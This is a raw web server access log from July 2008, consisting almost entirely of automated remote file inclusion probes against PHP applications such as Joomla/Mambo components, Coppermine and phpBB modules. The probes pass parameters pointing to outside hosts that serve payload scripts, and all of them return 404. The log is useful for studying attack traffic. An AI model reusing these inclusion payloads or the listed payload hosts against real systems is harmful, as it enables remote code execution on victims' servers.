209.25.195.68 - - [13/Jul/2008:17:00:40 -0700] "GET /logs/access.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:00:41 -0700] "GET /errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:00:41 -0700] "GET /logs/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:00:53 -0700] "GET /logs/access.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:00:53 -0700] "GET /errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:00:53 -0700] "GET /logs/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
85.17.200.206 - - [13/Jul/2008:17:01:26 -0700] "GET /logs/access_080414.log//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:01:50 -0700] "GET /logs/access.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:01:52 -0700] "GET /logs/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:01:52 -0700] "GET /errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.102.132 - - [13/Jul/2008:17:01:53 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.neighborhoodglimpses.com"
70.85.102.132 - - [13/Jul/2008:17:01:53 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:01:59 -0700] "GET /logs/access.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:02:00 -0700] "GET /errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:02:00 -0700] "GET /logs/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
75.127.83.69 - - [13/Jul/2008:17:02:29 -0700] "GET /logs/access_080211.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rites.com/calls/excel/mail.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
75.127.83.69 - - [13/Jul/2008:17:02:29 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rites.com/calls/excel/mail.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
75.127.83.69 - - [13/Jul/2008:17:02:29 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rites.com/calls/excel/mail.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:03:14 -0700] "GET /logs/access.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:03:14 -0700] "GET /logs/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:03:15 -0700] "GET /errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:04:16 -0700] "GET /logs/access_080414.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:04:16 -0700] "GET /errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:04:16 -0700] "GET /logs/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:04:31 -0700] "GET /errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:04:31 -0700] "GET /logs/access_080414.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:04:31 -0700] "GET /logs/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
194.79.75.195 - - [13/Jul/2008:17:04:52 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.neighborhoodglimpses.com"
194.79.75.195 - - [13/Jul/2008:17:04:52 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:04:55 -0700] "GET /logs/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:04:56 -0700] "GET /logs/access_080225.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:04:56 -0700] "GET /logs/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:04:56 -0700] "GET /errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:04:58 -0700] "GET /logs/access_080225.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:04:58 -0700] "GET /errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:05:11 -0700] "GET /logs/access_080414.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:05:11 -0700] "GET /logs/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:05:11 -0700] "GET /errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:05:14 -0700] "GET /logs/access_080414.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:05:14 -0700] "GET /errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:05:15 -0700] "GET /logs/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:05:48 -0700] "GET /logs/access_080225.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:05:49 -0700] "GET /errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:05:49 -0700] "GET /logs/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:05:51 -0700] "GET /logs/access_080414.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:05:51 -0700] "GET /errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:05:51 -0700] "GET /logs/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:05:53 -0700] "GET /logs/access_080225.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:05:53 -0700] "GET /errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:05:54 -0700] "GET /logs/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
74.6.8.94 - - [13/Jul/2008:17:06:11 -0700] "GET /logs/access_080414.log HTTP/1.0" 200 6730446 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:06:12 -0700] "GET /logs/access_080225.log/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:06:12 -0700] "GET /logs/errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:06:12 -0700] "GET /errors.php?error=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.113.237.92 - - [13/Jul/2008:17:06:48 -0700] "GET /logs/access.log//index.php?option=com_content&task=view&id=47&Itemid=75//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
209.113.237.92 - - [13/Jul/2008:17:06:49 -0700] "GET //index.php?option=com_content&task=view&id=47&Itemid=75//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
209.113.237.92 - - [13/Jul/2008:17:06:49 -0700] "GET /logs//index.php?option=com_content&task=view&id=47&Itemid=75//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
77.232.68.17 - - [13/Jul/2008:17:07:27 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
77.232.68.17 - - [13/Jul/2008:17:07:27 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
77.232.68.17 - - [13/Jul/2008:17:07:27 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
217.151.102.50 - - [13/Jul/2008:17:07:39 -0700] "GET /index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
75.127.83.69 - - [13/Jul/2008:17:08:21 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rites.com/calls/excel/mail.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
85.17.103.109 - - [13/Jul/2008:17:08:55 -0700] "GET /logs/access.log/index1.php?=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
85.17.103.109 - - [13/Jul/2008:17:08:56 -0700] "GET /index1.php?=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
85.17.103.109 - - [13/Jul/2008:17:08:56 -0700] "GET /logs/index1.php?=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
89.248.101.56 - - [13/Jul/2008:17:09:41 -0700] "GET /logs/access_080211.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
217.151.102.50 - - [13/Jul/2008:17:09:44 -0700] "GET /index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.248.101.56 - - [13/Jul/2008:17:09:45 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
209.216.2.12 - - [13/Jul/2008:17:09:47 -0700] "GET /logs/access.log/vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.articledirectorysite.com//oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
209.216.2.12 - - [13/Jul/2008:17:09:47 -0700] "GET /vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.articledirectorysite.com//oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
209.216.2.12 - - [13/Jul/2008:17:09:47 -0700] "GET /logs/vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.articledirectorysite.com//oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.248.101.56 - - [13/Jul/2008:17:09:48 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
87.106.18.76 - - [13/Jul/2008:17:10:35 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.18.76 - - [13/Jul/2008:17:10:40 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.151.102.50 - - [13/Jul/2008:17:12:13 -0700] "GET /logs/access_080211.log/index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
217.151.102.50 - - [13/Jul/2008:17:12:13 -0700] "GET /logs/index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
75.127.83.69 - - [13/Jul/2008:17:12:18 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rites.com/calls/excel/mail.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
75.127.83.69 - - [13/Jul/2008:17:12:18 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rites.com/calls/excel/mail.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
209.113.237.92 - - [13/Jul/2008:17:13:39 -0700] "GET /logs/access.log//index.php?option=com_content&task=view&id=47&Itemid=75//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
209.113.237.92 - - [13/Jul/2008:17:13:41 -0700] "GET //index.php?option=com_content&task=view&id=47&Itemid=75//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
209.113.237.92 - - [13/Jul/2008:17:13:41 -0700] "GET /logs//index.php?option=com_content&task=view&id=47&Itemid=75//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
118.129.166.13 - - [13/Jul/2008:17:16:20 -0700] "GET /skin/zero_vote/error.php?dir=http://c0d3d.t35.com/she.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
69.72.172.10 - - [13/Jul/2008:17:20:20 -0700] "GET /logs/access.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://sergio.freesitespace.net/scripts/korn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
69.72.172.10 - - [13/Jul/2008:17:20:20 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://sergio.freesitespace.net/scripts/korn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
69.72.172.10 - - [13/Jul/2008:17:20:20 -0700] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://sergio.freesitespace.net/scripts/korn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
85.17.200.206 - - [13/Jul/2008:17:27:44 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
85.17.200.206 - - [13/Jul/2008:17:27:45 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
85.17.200.206 - - [13/Jul/2008:17:27:45 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
217.151.102.50 - - [13/Jul/2008:17:28:05 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
85.17.200.206 - - [13/Jul/2008:17:28:31 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://gallerycnl.com/bbs/data/member/1159027099/id_jaheem.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.neighborhoodglimpses.com"
85.17.200.206 - - [13/Jul/2008:17:28:32 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://gallerycnl.com/bbs/data/member/1159027099/id_jaheem.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.neighborhoodglimpses.com"
85.17.200.206 - - [13/Jul/2008:17:28:47 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://gallerycnl.com/bbs/data/member/1159027099/id_jaheem.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "neighborhoodglimpses.com"
85.17.200.206 - - [13/Jul/2008:17:28:47 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://gallerycnl.com/bbs/data/member/1159027099/id_jaheem.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "neighborhoodglimpses.com"
217.151.102.50 - - [13/Jul/2008:17:29:10 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.151.102.50 - - [13/Jul/2008:17:31:07 -0700] "GET /index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
89.111.176.106 - - [13/Jul/2008:17:31:25 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.111.176.106 - - [13/Jul/2008:17:31:25 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.111.176.106 - - [13/Jul/2008:17:31:26 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.17.200.206 - - [13/Jul/2008:17:32:24 -0700] "GET /logs/access_080211.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
85.17.200.206 - - [13/Jul/2008:17:32:24 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
85.17.200.206 - - [13/Jul/2008:17:32:24 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
217.151.102.50 - - [13/Jul/2008:17:33:06 -0700] "GET /index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
58.227.193.211 - - [13/Jul/2008:17:33:18 -0700] "GET /index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
58.227.193.211 - - [13/Jul/2008:17:33:18 -0700] "GET /index.php?incl=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
217.151.102.50 - - [13/Jul/2008:17:35:08 -0700] "GET /logs/access_080211.log/index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
217.151.102.50 - - [13/Jul/2008:17:35:09 -0700] "GET /logs/index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
85.17.200.206 - - [13/Jul/2008:17:35:33 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
85.17.200.206 - - [13/Jul/2008:17:35:34 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
85.17.200.206 - - [13/Jul/2008:17:35:34 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
85.17.200.206 - - [13/Jul/2008:17:36:29 -0700] "GET //include/bbs.lib.inc.php?site_path=http://gallerycnl.com/bbs/data/member/1159027099/id_jaheem.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.neighborhoodglimpses.com"
85.17.200.206 - - [13/Jul/2008:17:36:29 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://gallerycnl.com/bbs/data/member/1159027099/id_jaheem.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.neighborhoodglimpses.com"
82.194.66.40 - - [13/Jul/2008:17:37:04 -0700] "GET /logs/access.log//index.php?option=com_content&task=view&id=47&Itemid=75//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
